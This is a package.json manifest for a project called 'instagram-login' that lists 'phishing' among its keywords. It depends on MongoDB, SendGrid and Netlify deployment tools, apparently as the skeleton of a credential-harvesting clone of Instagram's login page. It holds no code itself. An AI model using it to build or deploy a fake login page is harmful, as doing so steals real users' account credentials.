{
  "name": "instagram-login",
  "version": "1.0.0",
  "description": "Instagram login page with secure backend integration",
  "main": "index.html",
  "scripts": {
    "test": "node local-server.js",
    "start": "node local-server.js",
    "dev": "node local-server.js",
    "build": "echo 'No build step required'",
    "deploy": "netlify deploy --prod",
    "logs": "netlify logs"
  },
  "keywords": [
    "instagram",
    "login",
    "phishing",
    "security",
    "mongodb",
    "vercel",
    "serverless"
  ],
  "author": "Your Name",
  "license": "MIT",
  "dependencies": {
    "@sendgrid/mail": "^7.7.0",
    "express": "^5.1.0",
    "mongodb": "^6.20.0"
  },
  "devDependencies": {
    "netlify-cli": "^17.0.0"
  },
  "engines": {
    "node": ">=18.0.0"
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/yourusername/instagram-login.git"
  },
  "bugs": {
    "url": "https://github.com/yourusername/instagram-login/issues"
  },
  "homepage": "https://github.com/yourusername/instagram-login#readme"
}
